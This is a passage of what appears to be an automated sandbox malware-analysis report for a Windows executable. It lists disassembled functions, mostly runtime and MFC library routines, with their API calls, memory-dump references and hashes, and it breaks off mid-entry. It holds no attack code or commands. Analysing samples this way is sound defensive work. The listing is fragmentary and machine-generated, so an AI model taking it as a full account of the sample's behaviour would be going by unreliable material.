                                                                  • SetLastError.KERNEL32(00000000,?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00411E0B
                                                                    • Part of subcall function 004106DA: __lock.LIBCMT ref: 0041071E
                                                                    • Part of subcall function 004106DA: HeapAlloc.KERNEL32(00000008,?,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 0041075C
                                                                  • FlsSetValue.KERNEL32(00000000,?,00410723,00000004,00431B20,00000010,0041200F,00000001,0000008C,?,00431A70,00000060), ref: 00411DDC
                                                                  • GetCurrentThreadId.KERNEL32 ref: 00411DF4
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLastValue$AllocCurrentHeapThread__lock
                                                                  • String ID:
                                                                  • API String ID: 3368326513-0
                                                                  • Opcode ID: a2e0e11b31321dbee8d00aaa3ff715e8f4c10284b2315e1796a463f44e233b22
                                                                  • Instruction ID: 2e555c96cbcdb27f1e987eae822a5d52ba16f41a925a0101c91ccab380ceafb0
                                                                  • Opcode Fuzzy Hash: a2e0e11b31321dbee8d00aaa3ff715e8f4c10284b2315e1796a463f44e233b22
                                                                  • Instruction Fuzzy Hash: 9CF0FC31B01711DFD7301FB1AC4A6877BA4FB00762B00563AF982E62B0CB74884147E8
                                                                  Function 00429D50 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • TlsFree.KERNEL32(00695838,?,?,00429DC7,00000000,00000001), ref: 00429D76
                                                                  • GlobalHandle.KERNEL32(00662F78), ref: 00429D84
                                                                  • GlobalUnlock.KERNEL32(00000000,?,?,00429DC7,00000000,00000001), ref: 00429D8D
                                                                  • GlobalFree.KERNEL32(00000000), ref: 00429D94
                                                                  • DeleteCriticalSection.KERNEL32(0043F184,?,?,00429DC7,00000000,00000001), ref: 00429D9E
                                                                    • Part of subcall function 00429BB8: EnterCriticalSection.KERNEL32(?), ref: 00429C15
                                                                    • Part of subcall function 00429BB8: LeaveCriticalSection.KERNEL32(?,?), ref: 00429C25
                                                                    • Part of subcall function 00429BB8: LocalFree.KERNEL32(?), ref: 00429C2E
                                                                    • Part of subcall function 00429BB8: TlsSetValue.KERNEL32(?,00000000), ref: 00429C40
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: CriticalFreeGlobalSection$DeleteEnterHandleLeaveLocalUnlockValue
                                                                  • String ID:
                                                                  • API String ID: 1549993015-0
                                                                  • Opcode ID: cda239e742f0368a0fb7abb0ada14223e37cfef73ab97b54edbb53a213948107
                                                                  • Instruction ID: f3a137cc99f00e13c3aa807b9edadb0f25c424e624a33044372182c2df137c47
                                                                  • Opcode Fuzzy Hash: cda239e742f0368a0fb7abb0ada14223e37cfef73ab97b54edbb53a213948107
                                                                  • Instruction Fuzzy Hash: DFF089313005109BD631AB39BC48A7B76BCAF85711B95066AF816D3351D738DC03576D
                                                                  Function 0040B692 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 297memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0040B697
                                                                  • CoTaskMemAlloc.OLE32(?,?,?,00000000), ref: 0040B7BE
                                                                  • CoTaskMemFree.OLE32(?,?,00000000), ref: 0040B9D6
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Task$AllocFreeH_prolog
                                                                  • String ID:
                                                                  • API String ID: 1522537378-3916222277
                                                                  • Opcode ID: 929f9b5ebdec0014ec1f74a148c8dfc2360b127b466e663828303ad3da1abc5d
                                                                  • Instruction ID: ad970cdde69fdafffcc6cb1f39cb6ed57967dbf095fb62cede4e6b66b95c3350
                                                                  • Opcode Fuzzy Hash: 929f9b5ebdec0014ec1f74a148c8dfc2360b127b466e663828303ad3da1abc5d
                                                                  • Instruction Fuzzy Hash: 06C13970A00608DFCB24DFA9C884AAEB7B5FF88304F20456EE546E7391DB75A945CF58
                                                                  Function 00408C38 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ClearH_prologVariant
                                                                  • String ID: @$@
                                                                  • API String ID: 1166855276-149943524
                                                                  • Opcode ID: f802b67e1e94a0780ee79d7fc30415edf74127099df7fd6265c2581392f00dde
                                                                  • Instruction ID: ef86999ad6ee6f5cf559b2610e0ac6289f61f51e6328f32c9ffdf30846b8a703
                                                                  • Opcode Fuzzy Hash: f802b67e1e94a0780ee79d7fc30415edf74127099df7fd6265c2581392f00dde
                                                                  • Instruction Fuzzy Hash: 9151B7B1A002199FDB04CFA9C9889EEBBF9FF48314F14456EE506EB250E774A945CF60
                                                                  Function 004289CD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetMenuCheckMarkDimensions.USER32 ref: 004289E3
                                                                  • CreateBitmap.GDI32(?,?,00000001,00000001,?), ref: 00428A85
                                                                  • LoadBitmapA.USER32(00000000,00007FE3), ref: 00428A9D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Bitmap$CheckCreateDimensionsLoadMarkMenu
                                                                  • String ID:
                                                                  • API String ID: 2596413745-3916222277
                                                                  • Opcode ID: 570439933a1f319fde7bfb3e8c61f190201eae6d5acc9754518f2f5729fa7a47
                                                                  • Instruction ID: 0d6f9ecc143259180f96a21dbcd0bf36dcd83b506795b2bb56614b56ad416b1c
                                                                  • Opcode Fuzzy Hash: 570439933a1f319fde7bfb3e8c61f190201eae6d5acc9754518f2f5729fa7a47
                                                                  • Instruction Fuzzy Hash: 16213E71F002159FEB10CFB9EC85AAE7BB5EB44301F40053BE500EB291DA749545C794
                                                                  Function 0040BCE2 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 62COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID: 4C$TC$hC
                                                                  • API String ID: 3519838083-3679543769
                                                                  • Opcode ID: 6afed17d75f7f19130cad6cc9927d4617893c8389d2f54df1ee85911ac5e8f29
                                                                  • Instruction ID: 9a0aca956e13d3f40c7eff973b07ae7f3d28aa8e56d2adae96ddab1538bd35f0
                                                                  • Opcode Fuzzy Hash: 6afed17d75f7f19130cad6cc9927d4617893c8389d2f54df1ee85911ac5e8f29
                                                                  • Instruction Fuzzy Hash: D831AEB0901B448FD324CF6AC55579AFBE8BFA4308F009A1FD1EA97660C7B86548CF59
                                                                  Function 0041BC0C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog
                                                                  • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                  • API String ID: 3519838083-1866435925
                                                                  • Opcode ID: e1ee01469c0e13428d3df627346f863c2c2c07cf1eaebd9726a8b87e83a413b8
                                                                  • Instruction ID: ade85976828e3d0575b485422f14fa1a4d307c6e90aafc8175f67c845a6277e5
                                                                  • Opcode Fuzzy Hash: e1ee01469c0e13428d3df627346f863c2c2c07cf1eaebd9726a8b87e83a413b8
                                                                  • Instruction Fuzzy Hash: B61136719402089AD714EFE1CA92BDDB774EF04308F64902FA54567282EB7D6A85CB8C
                                                                  Function 0041C4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: H_prologIncrefstd::locale::facet::_
                                                                  • String ID: bad cast
                                                                  • API String ID: 931760182-3145022300
                                                                  • Opcode ID: 290d518eec50fe1289dc1a0e10ba9f74f951f3f8ce5a6758bf498ef8c1fa942f
                                                                  • Instruction ID: 133a5817c143689152e06119c2ce411d04637f97aac18120fb756b8f5cb4bf46
                                                                  • Opcode Fuzzy Hash: 290d518eec50fe1289dc1a0e10ba9f74f951f3f8ce5a6758bf498ef8c1fa942f
                                                                  • Instruction Fuzzy Hash: 0211A3B1E40224A7CB05EBA5CD41AEEB325AF84328F54022FF421A72C1CF3C9A45C799
                                                                  Function 0041C948 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0041C94D
                                                                  • int.LIBCPMT ref: 0041C971
                                                                    • Part of subcall function 0041C9EC: __EH_prolog.LIBCMT ref: 0041C9F1
                                                                  • std::locale::facet::_Incref.LIBCPMT ref: 0041C9C4
                                                                    • Part of subcall function 0040E342: RaiseException.KERNEL32(?,?,?,?,0043F1A0,00000000), ref: 0040E370
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: H_prolog$ExceptionIncrefRaisestd::locale::facet::_
                                                                  • String ID: bad cast
                                                                  • API String ID: 854657108-3145022300
                                                                  • Opcode ID: bd94b3fcc8be1ba825f3ac1fe391770fd2c7786acee73afc308fbf7023a4f06d
                                                                  • Instruction ID: e7bd6d74a278fbe87ccbf35d9b5790177d99eb31d3876a67708471b84b454a11
                                                                  • Opcode Fuzzy Hash: bd94b3fcc8be1ba825f3ac1fe391770fd2c7786acee73afc308fbf7023a4f06d
                                                                  • Instruction Fuzzy Hash: EC1173B2E4011497CF14EBA5D842BEE7334AF44368F50062FF421B72D1CB3C99448798
                                                                  Function 004282DC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 004282FE
                                                                  • PathFindExtensionA.SHLWAPI(?), ref: 00428315
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 0042833F
                                                                    • Part of subcall function 00427FF6: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00428019
                                                                    • Part of subcall function 00427FF6: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00428024
                                                                    • Part of subcall function 00427FF6: ConvertDefaultLocale.KERNEL32(?), ref: 00428055
                                                                    • Part of subcall function 00427FF6: ConvertDefaultLocale.KERNEL32(?), ref: 0042805D
                                                                    • Part of subcall function 00427FF6: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 0042806A
                                                                    • Part of subcall function 00427FF6: ConvertDefaultLocale.KERNEL32(?), ref: 00428084
                                                                    • Part of subcall function 00427FF6: ConvertDefaultLocale.KERNEL32(000003FF), ref: 0042808A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ConvertDefaultLocale$AddressModuleProc$ExtensionFileFindHandleNamePathlstrcpy
                                                                  • String ID: %s.dll
                                                                  • API String ID: 4178508759-3668843792
                                                                  • Opcode ID: 85535ec0e5e890c2202cf6ef6c4d9fe4ba616bd64fcc6351fedbe745838c2431
                                                                  • Instruction ID: aeac6e575d03eafd3f6c487df0eb32fa97cf7b4fa9cce637b04c964ddecc85eb
                                                                  • Opcode Fuzzy Hash: 85535ec0e5e890c2202cf6ef6c4d9fe4ba616bd64fcc6351fedbe745838c2431
                                                                  • Instruction Fuzzy Hash: E101DD72F001189BCF15DBA5EC859DF77BCFB4C344F4408BEA606E3140DAB95A458B55
                                                                  Function 0040BEF2 Relevance: 6.2, APIs: 4, Instructions: 186COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: FreeTask$ClearH_prologVariant
                                                                  • String ID:
                                                                  • API String ID: 82050969-0
                                                                  • Opcode ID: aa54fe472d68a3241bf7ad01d18b909729e7cebb57c0b9826251c15e0844cbce
                                                                  • Instruction ID: aff64e16e21245f6878e9bb53209405c6384404d08c4ae572c20ba40f5270c01
                                                                  • Opcode Fuzzy Hash: aa54fe472d68a3241bf7ad01d18b909729e7cebb57c0b9826251c15e0844cbce
                                                                  • Instruction Fuzzy Hash: 1371F271A00602DFCB20DFA5C98486AB3B6FF48308754097EE556E76A1CB39AC41CB58
                                                                  Function 021F21A0 Relevance: 6.2, APIs: 4, Instructions: 182COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsBadHugeReadPtr.KERNEL32(00000000,00000014), ref: 021F21F9
                                                                  • SetLastError.KERNEL32(0000007E), ref: 021F223B
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2113850461.00000000021F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 021F1000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_21f1000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ErrorHugeLastRead
                                                                  • String ID:
                                                                  • API String ID: 3239643929-0
                                                                  • Opcode ID: ff59f180f2ff5cb673f7b2b59e0467fe8b0b4757ef12f2a658b9fe6ad8965073
                                                                  • Instruction ID: ed2ad3fd605c8234a36f3e1cf64749aa27c312f71796c8891f58c6c121c656e3
                                                                  • Opcode Fuzzy Hash: ff59f180f2ff5cb673f7b2b59e0467fe8b0b4757ef12f2a658b9fe6ad8965073
                                                                  • Instruction Fuzzy Hash: 8481BBB4A40209DFDB44DF94C894BAEB7B1FF48314F158198E929AB355C734EA81CF91
                                                                  Function 00419D07 Relevance: 6.2, APIs: 4, Instructions: 167fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ReadFile.KERNEL32(?,?,00000000,?,00000000,?,?,?), ref: 00419D81
                                                                  • GetLastError.KERNEL32(?,?,?), ref: 00419D8B
                                                                  • ReadFile.KERNEL32(?,?,00000001,?,00000000,?,?,?), ref: 00419E54
                                                                  • GetLastError.KERNEL32(?,?,?), ref: 00419E5E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastRead
                                                                  • String ID:
                                                                  • API String ID: 1948546556-0
                                                                  • Opcode ID: 5231f9cba8860c89ca05e19dafb1a2c24a41461642442fb6cf506ca3b38b4cc7
                                                                  • Instruction ID: b56e1250b5eeb3e03af337cf5b8aade3a6d5dc35aadc41e3464ab86f92864a86
                                                                  • Opcode Fuzzy Hash: 5231f9cba8860c89ca05e19dafb1a2c24a41461642442fb6cf506ca3b38b4cc7
                                                                  • Instruction Fuzzy Hash: B26191706043859FDF21CF58C894BEA7BE4AF11304F1845ABE8518B2D1D378DD95CB5A
                                                                  Function 0040BAD2 Relevance: 6.2, APIs: 4, Instructions: 165windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • IsWindowVisible.USER32(?), ref: 0040BAF0
                                                                  • GetDesktopWindow.USER32 ref: 0040BB03
                                                                  • GetWindowRect.USER32(?,?), ref: 0040BB16
                                                                  • GetWindowRect.USER32(?,?), ref: 0040BB23
                                                                    • Part of subcall function 00423D5B: MoveWindow.USER32(?,?,?,00000000,?,00000000,?,0040BC64,?,?), ref: 00423D76
                                                                    • Part of subcall function 00423D99: ShowWindow.USER32(?,?,0040BC6D,00000000,?,?), ref: 00423DA6
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$DesktopMoveShowVisible
                                                                  • String ID:
                                                                  • API String ID: 3835705305-0
                                                                  • Opcode ID: 02730a8dcdf5586f36da1b8026ee27db7f50392f629d12665f502e7a90036cb3
                                                                  • Instruction ID: 0b392027358f973cf9a87025e36c0637855173732e828471bea61ad1e95020aa
                                                                  • Opcode Fuzzy Hash: 02730a8dcdf5586f36da1b8026ee27db7f50392f629d12665f502e7a90036cb3
                                                                  • Instruction Fuzzy Hash: 51510C75A0020AEFDB00DFA9D998CAEB7B9EF48705B14446DF501E7254CB39EE01CB64
                                                                  Function 00415FCF Relevance: 6.2, APIs: 4, Instructions: 165COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: _strcspn_strlen_strncpy_strpbrk
                                                                  • String ID:
                                                                  • API String ID: 635841138-0
                                                                  • Opcode ID: 4acd2b3da59a346ea89797bb7e0e1b5f04a14f124cc7c14e013e1c037170ab40
                                                                  • Instruction ID: 44dc5c145c95b46dcc10438fb611d3ac7f676edd126e77a362cf6d6368d72d10
                                                                  • Opcode Fuzzy Hash: 4acd2b3da59a346ea89797bb7e0e1b5f04a14f124cc7c14e013e1c037170ab40
                                                                  • Instruction Fuzzy Hash: 90510B76D0421AAADF21DBA59C816FF77A8AB44348F26042FD511A3243E77CCDC1C799
                                                                  Function 00416F27 Relevance: 6.1, APIs: 4, Instructions: 145fileCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000,?,?,00000001), ref: 0041700F
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2112269745.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000000.00000002.2112253978.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112319985.000000000042E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112350721.000000000043F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2112408417.0000000000441000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_400000_ExeFile (233).jbxd
                                                                  Similarity
                                                                  • API ID: FileWrite
                                                                  • String ID:
                                                                  • API String ID: 3934441357-0
                                                                  • Opcode ID: 96b8e6bb5318c80f56763d940f7dc6e0f4e8b6228f9512b9e20a3a71bbbea6aa
                                                                  • Instruction ID: 6123c53501c71611ec199f00bb1904ad0936d21d6721be59c225a486e99e16bd
                                                                  • Opcode Fuzzy Hash: 96b8e6bb5318c80f56763d940f7dc6e0f4e8b6228f9512b9e20a3a71bbbea6aa
                                                                  • Instruction Fuzzy Hash: F2514E71904348DFDB32CFA9D880AEDBBB8FF49304F21416AE855AB252D7349A81CF15
                                                                  Function 00425954 Relevance: 6.1, APIs: 4, Instructions: 115stringCOMMON
                                                                  Download Yara Rule
